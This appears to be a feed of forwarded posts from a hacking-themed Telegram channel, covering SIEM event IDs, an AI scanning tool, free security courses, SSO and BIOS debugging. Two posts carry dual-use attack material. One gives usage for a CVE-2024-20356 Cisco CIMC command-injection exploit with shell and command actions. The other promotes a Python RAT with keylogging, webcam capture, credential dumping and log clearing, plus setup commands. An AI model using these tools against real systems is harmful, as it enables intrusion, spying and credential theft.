Forwarded from Exploiting Crew (Pr1vAt3)
105 Windows SIEM Use Cases
1. Failed Login Attempts - Event ID: 4625
2. Account Lockouts - Event ID: 4740
3. Successful Login Outside Business Hours - Event ID: 4624
4. New User Creation - Event ID: 4720
5. Privileged Account Usage - Event ID: 4672
6. User Account Changes - Event IDs: 4722, 4723, 4724, 4725, 4726
7. Logon from Unusual Locations - Event ID: 4624 (with geolocation analysis)
8. Password Changes - Event ID: 4723 (change attempt), 4724 (successful reset)
9. Group Membership Changes - Event IDs: 4727, 4731, 4735, 4737
10. Suspicious Logon Patterns - Event ID: 4624 (anomalous logons)
11. Excessive Logon Failures - Event ID: 4625
12. Disabled Account Activity - Event ID: 4725
13. Dormant Account Usage - Event ID: 4624 (rarely used accounts)
14. Service Account Activity - Event IDs: 4624, 4672
15. RDP Access Monitoring - Event ID: 4624 (with RDP-specific filtering)
16. Lateral Movement Detection - Event ID: 4648 (network logons)
17. File and Folder Access - Event ID: 4663
18. Unauthorised File Sharing - Event IDs: 5140, 5145
19. Registry Changes - Event ID: 4657
20. Application Installation and Removal - Event IDs: 11707, 1033
21. USB Device Usage - Event IDs: 20001, 20003 (from Device Management logs)
22. Windows Firewall Changes - Event IDs: 4946, 4947, 4950, 4951
23. Scheduled Task Creation - Event ID: 4698
24. Process Execution Monitoring - Event ID: 4688
25. System Restart or Shutdown - Event IDs: 6005, 6006, 1074
26. Event Log Clearing - Event ID: 1102
27. Malware Execution or Indicators - Event IDs: 4688, 1116 (from Windows Defender)
28. Active Directory Changes - Event IDs: 5136, 5141
29. Shadow Copy Deletion - Event ID: 524 (with VSSAdmin logs)
30. Network Configuration Changes - Event IDs: 4254, 4255, 10400
31. Execution of Suspicious Scripts - Event ID: 4688 (process creation with script interpreter)
32. Service Installation or Modification - Event ID: 4697
33. Clearing of Audit Logs - Event ID: 1102
34. Software Restriction Policy Violation - Event ID: 865
35. Excessive Account Enumeration - Event IDs: 4625, 4776
36. Attempt to Access Sensitive Files - Event ID: 4663
37. Unusual Process Injection - Event ID: 4688 (with EDR or Sysmon data)
38. Driver Installation - Event ID: 7045 (Service Control Manager)
39. Modification of Scheduled Tasks - Event ID: 4699
40. Unauthorised GPO Changes - Event ID: 5136
41. Suspicious PowerShell Activity - Event ID: 4104 (from PowerShell logs)
42. Unusual Network Connections - Event ID: 5156 (network filtering platform)
43. Unauthorised Access to Shared Files - Event ID: 5145
44. DNS Query for Malicious Domains - Event ID: 5158 (DNS logs required)
45. LDAP Search Abuse - Event ID: 4662
46. Process Termination Monitoring - Event ID: 4689
47. Failed Attempts to Start a Service - Event ID: 7041
48. Audit Policy Changes - Event IDs: 4719, 1102
49. Time Change Monitoring - Event IDs: 4616, 520
50. BitLocker Encryption Key Changes - Event ID: 5379
ref: Shahaz Mz
@UndercodeCommunity
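As an added example (not part of the original post), the Python below turns four of the use cases above into runnable rules over a constructed set of Security-log events: use case 11 (a burst of 4625 failures from one source), use case 10 (a 4624 success right after that burst), use case 3 (an interactive or RDP 4624 outside business hours) and use case 26 (1102 log clearing). The event field names, thresholds and sample events are assumptions made for the example.

```python
"""Toy SIEM rules for four of the Windows use cases above, run over constructed events."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAIL_THRESHOLD = 5                 # 4625 events from one source before alerting (assumed)
WINDOW = timedelta(minutes=5)      # sliding window for counting failures (assumed)
BUSINESS_HOURS = range(8, 18)      # 08:00-17:59 local time counts as business hours (assumed)
INTERACTIVE_LOGON_TYPES = {2, 10}  # 4624 LogonType 2 = console, 10 = RDP (RemoteInteractive)

# Constructed sample events (not real logs); fields mirror Security.evtx attributes.
SAMPLE_EVENTS = [
    {"time": "2024-03-04T02:14:05", "id": 4625, "user": "svc_backup", "src": "10.0.0.7", "logon_type": 3},
    {"time": "2024-03-04T02:14:20", "id": 4625, "user": "svc_backup", "src": "10.0.0.7", "logon_type": 3},
    {"time": "2024-03-04T02:14:35", "id": 4625, "user": "svc_backup", "src": "10.0.0.7", "logon_type": 3},
    {"time": "2024-03-04T02:14:50", "id": 4625, "user": "svc_backup", "src": "10.0.0.7", "logon_type": 3},
    {"time": "2024-03-04T02:15:05", "id": 4625, "user": "svc_backup", "src": "10.0.0.7", "logon_type": 3},
    {"time": "2024-03-04T02:16:00", "id": 4624, "user": "svc_backup", "src": "10.0.0.7", "logon_type": 10},
    {"time": "2024-03-04T02:31:00", "id": 1102, "user": "svc_backup", "src": "-", "logon_type": None},
    {"time": "2024-03-04T09:15:00", "id": 4624, "user": "alice", "src": "10.0.0.21", "logon_type": 2},
]


def run_detections(events):
    """Return alerts in time order; each alert names the use case it implements."""
    alerts = []
    failures = defaultdict(deque)   # source address -> timestamps of 4625 inside WINDOW
    alerted_sources = set()         # alert once per source per burst, not once per event
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        src = ev["src"]
        if ev["id"] == 4625:
            q = failures[src]
            q.append(ts)
            while ts - q[0] > WINDOW:          # drop failures older than the window
                q.popleft()
            if len(q) >= FAIL_THRESHOLD and src not in alerted_sources:
                alerted_sources.add(src)
                alerts.append({"rule": "excessive_logon_failures", "use_case": 11,
                               "event_id": 4625, "src": src, "count": len(q), "time": ev["time"]})
        elif ev["id"] == 4624:
            recent = [f for f in failures.get(src, ()) if ts - f <= WINDOW]
            if len(recent) >= FAIL_THRESHOLD:   # a success right after a burst of failures
                alerts.append({"rule": "logon_after_failures", "use_case": 10,
                               "event_id": 4624, "src": src, "user": ev["user"], "time": ev["time"]})
            if ev["logon_type"] in INTERACTIVE_LOGON_TYPES and ts.hour not in BUSINESS_HOURS:
                alerts.append({"rule": "logon_outside_business_hours", "use_case": 3,
                               "event_id": 4624, "src": src, "user": ev["user"], "time": ev["time"]})
        elif ev["id"] == 1102:
            alerts.append({"rule": "event_log_cleared", "use_case": 26,
                           "event_id": 1102, "user": ev["user"], "time": ev["time"]})
    return alerts


if __name__ == "__main__":
    for alert in run_detections(SAMPLE_EVENTS):
        print(alert)
```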
Forwarded from Exploiting Crew (Pr1vAt3)
AI-powered ethical hacking tool (Nebula):
Features
- Natural Language Processing: Executes commands based on user input, translating intent into action seamlessly.
- Command Search Engine: Facilitates the search for services, ports, or specific terms, providing curated command suggestions to identify vulnerabilities.
» Supported Ethical Hacking Tools:
1. NMAP: Network discovery and security auditing.
2. OWASP ZAP (Full Scan Only): Web application security scanner.
3. Crackmapexec: Network information gathering.
4. Nuclei: Template-based fast scanning with zero false positives.
» Compatibility
- Optimized for Linux: Fully functional on Linux platforms.
- Limited/No Support: Functionality on Windows or macOS is not guaranteed.
System Requirements
Non-Docker Installation
- Storage: 50GB
- RAM: 16GB minimum
- GPU: 8GB recommended for optimal performance.
» Dependencies
- Linux (Debian-based):
- Installations:
sudo apt -y install exploitdb libreadline-dev wget nmap crackmapexec nuclei
- Git-based exploitdb:
sudo git clone https://gitlab.com/exploit-database/exploitdb.git /opt/exploitdb
sudo ln -sf /opt/exploitdb/searchsploit /usr/local/bin/searchsploit
» Installation
Docker Installation
1. Pulling the image:
docker pull berylliumsec/nebula:latest
2. Running without GPU:
docker run --rm -it berylliumsec/nebula:latest
3. Running with GPU:
docker run --rm --gpus all -v "$(pwd)":/app/unified_models_no_zap -it berylliumsec/nebula:latest
4. Autonomous mode:
- Default vulnerability scan:
docker run --rm --gpus all -v "$(pwd)/targets.txt":/app/targets.txt -v "$(pwd)"/unified_models:/app/unified_models -it nebula:latest --autonomous_mode True --targets_list /app/targets.txt
- Custom NMAP vulnerability scan:
docker run --rm --gpus all -v "$(pwd)/targets.txt":/app/targets.txt -v "$(pwd)"/unified_models:/app/unified_models -it nebula:latest --autonomous_mode True --nmap_vuln_scan_command="nmap -Pn -sV --exclude-ports 21 --script=vulscan/vulscan.nse" --targets_list /app/targets.txt
PIP Installation
1. Install:
pip install nebula-ai
2. Run:
nebula
3. For elevated privileges:
sudo pip install nebula-ai
sudo nebula
» Linux Post-Installation
1. Add the installation path to your .zshrc:
export PATH="$HOME/.local/bin:$PATH"
Nebula-Watcher (Optional Component)
PIP Installation
pip3 install nebula-watcher
Docker Installation
1. Pull the image:
docker pull berylliumsec/nebula_watcher:latest
2. Run:
docker run --network host -v /path/to/nmap_results:/app/results -v /path/to/output:/app/output berylliumsec/nebula_watcher:latest
Customize diagram name:
docker run --network host -v /path/to/nmap_results:/app/results -v /path/to/output:/app/output berylliumsec/nebula_watcher:latest python3 nebula_watcher.py --diagram_name /app/your_diagram_name
Forwarded from Exploiting Crew (Pr1vAt3)
Bitcoin Core Integration and Development:
>> What is Bitcoin Core?
Bitcoin Core is the reference implementation of Bitcoin, connecting to the peer-to-peer Bitcoin network. Its primary functions include:
- Downloading and fully validating blocks and transactions.
- Serving as a wallet.
- Providing an optional graphical user interface (GUI).
Binary versions are available for immediate use at [Bitcoin Core Downloads](https://bitcoincore.org/en/download/).
>> Licensing
Bitcoin Core is licensed under the MIT License, allowing free use and modification. Details can be found in the COPYING file or at the [MIT License site](https://opensource.org/licenses/MIT).
>> Development Process
- Master Branch: Continuously built and tested but may not always be stable.
- Release Branches and Tags: Created regularly to mark stable releases.
- GUI Development: Exclusively managed in the [bitcoin-core/gui repository](https://github.com/bitcoin-core/gui). This repository mirrors the monotree's master branch and does not have release branches or tags.
>># Contribution
Developers can follow the workflow in CONTRIBUTING.md. Additional insights and guidelines are in doc/developer-notes.md.
>> Testing and Quality Assurance
>># Automated Testing:
1. Unit Tests: Recommended for all new code and improvements to existing code. Use ctest to compile and run unit tests.
2. Regression and Integration Tests: Written in Python, executed with: build/test/functional/test_runner.py
3. CI Systems: Automatically test pull requests across Windows, Linux, and macOS platforms.
>># Manual Testing:
- Requires a reviewer distinct from the code author, particularly for substantial or high-risk changes.
- Adding a clear test plan in pull request descriptions is encouraged for complex changes.
Forwarded from Exploiting Crew (Pr1vAt3)
100% FREE classes for a pathway into cybersecurity and ethical hacking
Foundations:
Help Desk
- TCM Security Academy – Practical Help Desk (https://lnkd.in/geDEvt6d)
- Professor Messer – 220-1101 and 220-1102 A+ Courses (https://lnkd.in/gKjJsSPz & https://lnkd.in/gMW3hMsv)
Networking
- Professor Messer – N10-009 Network+ Course (https://lnkd.in/g8mYZaMm)
- Cisco Networking Academy – Packet Tracer (https://lnkd.in/guGibYx6)
Linux
- TCM Security Academy – Linux 100: Fundamentals (https://lnkd.in/gEGHzxw3)
- Linux Journey (https://linuxjourney.com/)
- OverTheWire – Bandit (https://lnkd.in/gRwPsump)
Programming
- TCM Security – Programming 100: Fundamentals (https://lnkd.in/gWZe2JRj)
- FreeCodeCamp (https://lnkd.in/gbaHhV34)
- Codecademy (https://lnkd.in/gxAHnTFD)
Security Essentials
- Professor Messer – SY0-701 Security+ Course (https://lnkd.in/gfCCMJqQ)
Hacking Essentials
- Ethical Hacking in 15 Hours Part 1 (https://lnkd.in/gWump_cZ)
- Ethical Hacking in 15 Hours Part 2 (https://lnkd.in/gH9_Ap7F)
- TryHackMe (https://tryhackme.com/)
Active Directory Hacking
- How to Build an Active Directory Hacking Lab (https://lnkd.in/g_9wjzhz)
- Hacking Active Directory for Beginners (https://lnkd.in/gaewN7nU)
Web Application Hacking
- PortSwigger Web Security Academy (https://lnkd.in/gvx6NgcZ)
- Hacker101 (https://www.hacker101.com/)
- Bugcrowd University (https://lnkd.in/g_aPUcD8)
Ref: Heath Adams
Forwarded from Exploiting Crew (Pr1vAt3)
Command injection vulnerability in Cisco's CIMC (CVE-2024-20356):
>> Use it for testing purposes only !!!
CVE-2024-20356.py [-h] -t HOST -u USERNAME -p PASSWORD [-a ACTION] [-c CMD] [-v]
options:
-h, --help Show this help message and exit
-t HOST, --host HOST Target hostname or IP address (format 10.0.0.1 or 10.0.0.2:1337)
-u USERNAME, --username USERNAME
Username (default: admin)
-p PASSWORD, --password PASSWORD
Password (default: cisco)
-a ACTION, --action ACTION
Action: test, cmd, shell, dance (default: test)
-c CMD, --cmd CMD OS command to run (Default: NONE)
-v, --verbose Displays more information about cimc
Example commands:
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -v
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -c 'id'
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -a shell
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -a dance
Safe CC Checkers:
Credit card checker (CC checker) sites are generally unsafe and pose serious risks, as they are commonly used for fraudulent purposes or involve illegal activities. Legitimate businesses and individuals should avoid such platforms to protect themselves legally and financially. Here's why these sites are risky:
- Illegal Usage: Most CC checkers facilitate fraud by validating stolen credit card information.
- Data Theft: Entering sensitive details on these platforms can lead to your personal data being stolen.
- Malware Risks: Many such sites embed malware or phishing attempts.
- Legal Issues: Accessing or using these sites can expose you to legal action.
So:
To check your CC validity, use only these URLs!!!
1. Stripe
https://stripe.com
A powerful payment processing platform with fraud prevention features.
2. PayPal
https://www.paypal.com
A widely used and secure platform for online transactions.
3. Square
https://squareup.com
Offers payment solutions and tools for small businesses.
4. Kount
https://kount.com
Fraud prevention and digital identity trust solutions.
5. Fraud.net
https://fraud.net
Provides AI-powered fraud detection for businesses.
6. Riskified
https://www.riskified.com
Fraud prevention and chargeback protection for eCommerce.
Forwarded from Exploiting Crew (Pr1vAt3)
SSO (Single Sign-On) Explained.
SSO can be thought of as a master key to open all different locks. It allows a user to log in to different systems using a single set of credentials.
In a time when we are accessing more applications than ever before, this is a big help to mitigate password fatigue and streamline the user experience.
To fully understand the SSO process, let's take a look at how a user would log into LinkedIn using Google as the identity provider:
1️⃣ User requests access
First, the user would attempt to access the Service Provider (LinkedIn). At this point, a user would be presented with login options, and in this example, they would select "Sign in with Google".
2️⃣ Authentication request
From here, the Service Provider (LinkedIn) will redirect the user to the Identity Provider (Google) with an authentication request.
3️⃣ IdP checks for active session
Once the Identity Provider (Google) has received the request, it will check for an active session. If it doesn't find one, authentication will be requested.
4️⃣ User submits credentials
At this stage, the user will submit their login credentials (username and password) to the Identity Provider (IdP).
5️⃣ IdP verifies credentials
The Identity Provider will then verify the submitted credentials against its User Directory (database). If the credentials are correct, the IdP will create an authentication token or assertion.
6️⃣ IdP sends token to Service Provider
Once the token or assertion has been created, the IdP sends it back to the Service Provider confirming the user's identity. The user is now authenticated and can access the Service Provider (LinkedIn).
7️⃣ Access granted using existing session
Since the Identity Provider has established a session, when the user goes to access a different Service Provider (e.g. GitHub), they won't need to re-enter their credentials. Future service providers will request authentication from the Identity Provider, recognize the existing session, and grant access to the user based on the previously authenticated session.
SSO workflows like the above operate on SSO protocols, which are a set of rules that govern how the IdP and SP communicate and trust each other. Common protocols include Security Assertion Markup Language (SAML), OpenID Connect, and OAuth.
ref: Sayed Jillani
@UndercodeCommunity
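The seven steps above as an added, runnable Python model (not from the original post, and not the SAML or OpenID Connect wire format): one IdP holding the user directory and active sessions, two SPs that trust it, and an assertion signed with a per-SP HMAC key that each SP checks for signature, issuer, audience and expiry before trusting the subject. The party names, the user "alice" and the assertion layout are constructed for the example.

```python
"""Toy SSO round trip modelled on the seven steps: one IdP, two SPs, signed assertions."""
import base64
import hashlib
import hmac
import json
import os
import secrets
import time


def hash_password(password: str, salt: bytes) -> bytes:
    # Slow, salted hash for the IdP's user directory (step 5 compares against this).
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


class IdentityProvider:
    def __init__(self, name, users):
        self.name = name
        self._directory = {}          # username -> (salt, password hash)
        for username, password in users.items():
            salt = os.urandom(16)
            self._directory[username] = (salt, hash_password(password, salt))
        self._sessions = {}           # session cookie -> username (step 3 looks here first)
        self._sp_keys = {}            # SP name -> HMAC key shared with that SP only

    def register_sp(self, sp_name):
        key = secrets.token_bytes(32)
        self._sp_keys[sp_name] = key
        return key

    def _credentials_ok(self, username, password):
        entry = self._directory.get(username)
        if entry is None or password is None:
            return False
        salt, stored = entry
        return hmac.compare_digest(stored, hash_password(password, salt))

    def authenticate(self, sp_name, session=None, username=None, password=None):
        """Steps 3 to 6: reuse an active session, else verify credentials, then issue an assertion."""
        user = self._sessions.get(session)
        if user is None:
            if not self._credentials_ok(username, password):
                return {"status": "login_required"}        # no session and no valid credentials
            user = username
            session = secrets.token_urlsafe(24)
            self._sessions[session] = user
        return {"status": "ok", "session": session, "assertion": self._issue(user, sp_name)}

    def _issue(self, user, sp_name):
        now = int(time.time())
        claims = {"iss": self.name, "sub": user, "aud": sp_name,
                  "iat": now, "exp": now + 300, "jti": secrets.token_hex(8)}
        body = base64.urlsafe_b64encode(json.dumps(claims).encode())
        sig = hmac.new(self._sp_keys[sp_name], body, hashlib.sha256).digest()
        return body + b"." + base64.urlsafe_b64encode(sig)


class ServiceProvider:
    def __init__(self, name, idp_name, key):
        self.name, self.idp_name, self._key = name, idp_name, key

    def accept(self, assertion):
        """Step 6 on the SP side: trust the subject only after signature, issuer, audience and expiry pass."""
        try:
            body, sig = assertion.split(b".", 1)
            expected = hmac.new(self._key, body, hashlib.sha256).digest()
            if not hmac.compare_digest(base64.urlsafe_b64decode(sig), expected):
                return None
            claims = json.loads(base64.urlsafe_b64decode(body))
        except ValueError:
            return None
        if claims.get("iss") != self.idp_name or claims.get("aud") != self.name:
            return None
        if claims.get("exp", 0) < time.time():
            return None
        return claims.get("sub")


def run_sso_flow():
    """Walk the LinkedIn-then-GitHub scenario and return what each party concluded."""
    google = IdentityProvider("google", {"alice": "correct horse battery staple"})
    linkedin = ServiceProvider("linkedin", "google", google.register_sp("linkedin"))
    github = ServiceProvider("github", "google", google.register_sp("github"))
    out = {}
    out["first_visit"] = google.authenticate("linkedin")["status"]            # steps 1-3: no session yet
    login = google.authenticate("linkedin", username="alice",
                                password="correct horse battery staple")     # steps 4-5
    out["linkedin_user"] = linkedin.accept(login["assertion"])               # step 6
    reuse = google.authenticate("github", session=login["session"])          # step 7: no password asked
    out["github_user"] = github.accept(reuse["assertion"])
    out["replay_to_github"] = github.accept(login["assertion"])              # LinkedIn's assertion at GitHub
    out["wrong_password"] = google.authenticate("linkedin", username="alice", password="nope")["status"]
    return out


if __name__ == "__main__":
    print(run_sso_flow())
```

The replay check is the part worth keeping in mind when reviewing a real SP: an assertion minted for one audience must be rejected by every other.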
Forwarded from Exploiting Crew (Pr1vAt3)
Scammers Actually Conduct Phishing Calls
- Secure yourself
ref: instagram
Forwarded from Exploiting Crew (Pr1vAt3)
Python Remote Administration Tool (RAT)
⚠️ This feature list outlines a Python-based Remote Administration Tool (RAT) with extensive functionality across Windows, macOS, and Linux. Here's a detailed breakdown of the core features and their implications:
>> Cross-Platform Support
- Core Utilities
  - Command and file auto-completion: Enhances usability, streamlining interactions.
  - Antivirus detection: Useful for evasion tactics or reconnaissance.
  - Display monitor control: Provides surveillance or energy management options.
  - File/Directory manipulation: Hiding or unhiding files adds stealth capabilities.
  - Hosts file modification: Potential for blocking or redirecting network traffic.
  - Environment variables access: Useful for reconnaissance and configuration.
  - Keylogger: Logs keystrokes with options to manage logs.
  - Target machine info: Location and system details provide situational awareness.
  - Python script execution: Flexibility for custom tasks.
  - Screenshots: Remote visual access to the system's desktop.
  - VM detection: Helps evade analysis environments.
  - File transfer: Enables exfiltration or delivery of additional payloads.
  - Password hash dumping: Attempts to extract sensitive authentication details.
  - Payload disguise: Adds stealth by masquerading as legitimate applications.
>> Windows-Specific Features
- Credential Harvesting
  - User/password dialog: Captures user input for credentials.
  - Chrome password dumping: Extracts stored browser passwords.
- System Control
  - Log clearing: Obscures tracks by erasing event logs.
  - Service control: Manipulates RDP, UAC, and Windows Defender.
  - File timestamp editing: Alters evidence of file access or modification.
  - Custom popups: Creates distractions or elicits user input.
- Hardware Interaction
  - Webcam snapshots: Spies on users via their webcam.
  - Drive info: Provides details about connected drives.
  - Registry summary: Fetches system configuration details.
>> macOS-Specific Features
- Credential Harvesting
  - Similar password dialog as Windows.
- System Customization
  - Changes login text, potentially confusing or misleading users.
  - Webcam snapshots: Monitors users like the Windows version.
>> macOS/Linux Features
- SSH pivoting: Leverages the target system to access other hosts.
- Sudo command execution: Elevates privilege level for administrative tasks.
- Bruteforce user password: Exploits weak password practices.
- Webcam snapshots: Unverified functionality on Linux.
>> Transport and Encryption
- AES encryption secures host-target communication, with keys shared manually between systems for authentication.
>> Payload Installation
- NSIS installers (Windows): Packages payloads with elevation utilities.
- Makeself installers (macOS/Linux): Simplifies deployment and persistence.
>> Setup and Dependencies
- The project uses Python 2.7, various libraries like PyCrypto, Requests, and platform-specific tools like PyInstaller, PyObjC, and py2exe.
Here are the commands for setting up and running Stitch from the specified GitHub repository:
>> Installation Commands
1. For Windows:
pip install -r win_requirements.txt
2. For macOS:
pip install -r osx_requirements.txt
3. For Linux:
pip install -r lnx_requirements.txt
>> Execution Commands
1. Run using Python:
python main.py
2. Run as an executable (if permissions are set):
./main.py
Be Ethical, Use it for learning purposes!!!
Forwarded from Exploiting Crew (Pr1vAt3)
UEFI BIOS Hacking Notes:
I started my Desktop System after a couple of weeks, and found that the ASUS Z170-AR 1.03 motherboard was failing to POST successfully with the following error message:
1️⃣ USB Device Over Current Status Detected !!
System Will Shut Down After 15 Seconds.
(November-2020): After downloading the BoardView file for a similar motherboard, I learned about the various OC (over current) detection sub-circuits present on the motherboard. I systematically checked the reference voltages present at all (4) of those voltage dividers and found them to be 3.26+ volts. Note: These voltage dividers ("sensors") are directly connected to the Mobo's PCH.
I also carried out the following debugging steps:
All of the USB ports were providing +5v and were able to detect the keyboard during BIOS POST (Caps Lock responded). They all seemed to be OK.
The single USB-C port on this mobo was also providing power to charge things just fine.
I connected the USB keyboard to the PS2 port but the BIOS was disabling all inputs when this 'USB OC' problem is detected.
All of the USB devices were subsequently disconnected for safety.
The cables for the front-panel USB connectors were disconnected as well.
However, the BIOS error about 'USB OC' persisted. I then dumped the BIOS from the W25Q128FV BIOS chip (thankfully present in DIP-8 form factor) using flashrom on Linux with CH341A Mini USB BIOS Programmer hardware.
2️⃣
$ sudo ./flashrom --programmer ch341a_spi -r bios_dump_another.rom
flashrom v1.2-136-ged341cf on Linux 5.8.0-26-lowlatency (x86_64)
flashrom is free software, get the source code at https://flashrom.org
Using clock_gettime for delay loops (clk_id: 1, resolution: 1ns).
Found Winbond flash chip "W25Q128.V" (16384 kB, SPI) on ch341a_spi.
Reading flash... done.
3️⃣ This dumping process took around 2.5 minutes. The dump matched the "BIOS ROM file" which I extracted from the Z170-AR-ASUS-3801.CAP (downloaded from ASUS' website) using UEFITool.
Note: This board uses the ASM1142 USB 3.0 chip which has its own over current (OC) detection. I couldn't find the BoardView for my Z170-AR 1.03 motherboard and hence I had to pause the hardware debugging process at this point.
Next, switching to the SW sides of things, I was able to patch the ASUS BIOS using UEFITool, GHIDRA, Cutter (Rizin GUI), and WinHex to bypass this USB OC error message (and the subsequent PC hang)!
binwalk -eM bios.rom # bios.rom is extracted from UEFItool.
[user@random _flash-me.rom.extracted]$ find . -type f -exec strings {} \; | grep "USB Device"
USB Device Over Current Status Detected !!
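The two software-side checks in the notes above (confirming that the flashrom dump matches the image extracted from the vendor .CAP, and locating the error message inside the extracted modules) can be done in one place without the external tools. The following is an added example, not code from the post or from flashrom, UEFITool or binwalk: it compares a dump against a reference image block by block, reports every differing region, and searches for the diagnostic string both as ASCII and as UCS-2/UTF-16LE, which is how many UEFI HII string packages store text and which plain `strings` does not show. The 64 KiB images, the offsets and the modified block are constructed for the demo.

```python
"""
Added example (not from the post or any of the tools it names): verify a SPI flash
dump against a reference firmware image and locate a diagnostic string in it.
All ROM data below is constructed inline; offsets are invented for the demo.
"""
import hashlib

# The message the post greps for. A UEFI module may hold it as ASCII or as UCS-2 (UTF-16LE).
TARGET = "USB Device Over Current Status Detected !!"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def diff_regions(a: bytes, b: bytes, block: int = 4096) -> list:
    """Return (offset, length) for each maximal run of differing blocks.

    Block granularity (4 KiB, the usual SPI erase sector) is enough to tell a
    legitimately changing NVRAM region from an unexpected code change, and a
    16 MiB image is only 4096 comparisons."""
    if len(a) != len(b):
        raise ValueError(f"size mismatch: {len(a)} vs {len(b)} bytes")
    regions = []
    start = None
    for off in range(0, len(a), block):
        same = a[off:off + block] == b[off:off + block]
        if not same and start is None:
            start = off
        elif same and start is not None:
            regions.append((start, off - start))
            start = None
    if start is not None:
        regions.append((start, len(a) - start))
    return regions


def find_string(image: bytes, text: str) -> list:
    """Find every occurrence of text, as ASCII and as UTF-16LE, as (offset, encoding)."""
    hits = []
    for enc in ("ascii", "utf-16-le"):
        needle = text.encode(enc)
        pos = image.find(needle)
        while pos != -1:
            hits.append((pos, enc))
            pos = image.find(needle, pos + 1)
    return sorted(hits)


def build_demo_images():
    """Constructed 64 KiB images: a 'vendor' image and a 'dump' with one modified block."""
    vendor = bytearray(b"\xff" * 0x10000)          # erased flash reads back as 0xFF
    vendor[0x1000:0x1000 + len(TARGET)] = TARGET.encode("ascii")
    ucs2 = TARGET.encode("utf-16-le")
    vendor[0x3000:0x3000 + len(ucs2)] = ucs2
    dump = bytearray(vendor)
    dump[0x8000:0x8010] = b"\x00" * 16              # one sector differs, e.g. NVRAM written
    return bytes(vendor), bytes(dump)


def verify(vendor: bytes, dump: bytes) -> dict:
    """Whole-image hash match, differing sectors, and where the target string lives."""
    return {
        "identical": sha256_hex(vendor) == sha256_hex(dump),
        "diff_regions": diff_regions(vendor, dump),
        "string_hits": find_string(dump, TARGET),
    }


if __name__ == "__main__":
    v, d = build_demo_images()
    r = verify(v, d)
    print("identical:", r["identical"])
    for off, ln in r["diff_regions"]:
        print(f"  differs at 0x{off:06x} ({ln} bytes)")
    for off, enc in r["string_hits"]:
        print(f"  target string at 0x{off:06x} as {enc}")
```

For a real dump, replace `build_demo_images()` with `open("bios_dump_another.rom", "rb").read()` and the ROM body extracted with UEFITool. If the whole-image hashes differ, the differing regions tell you whether the change sits in a variable store (expected to drift between dumps) or in a code volume (worth investigating). On the command line, GNU `strings -e l` performs the same 16-bit little-endian scan for the UCS-2 case.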
Telegram
UNDERCODE COMMUNITY
Undercode Cyber World!
@UndercodeCommunity
FREE
- Hackers Post Monitor:
Latest Bug bounty Methods, Tools Updates, AI, Courses! @Undercode_Testing
- Cyber & Tech NEWS:
@Undercode_News
- CVE: @Daily_CVE
Official Web & Services:
Undercode.help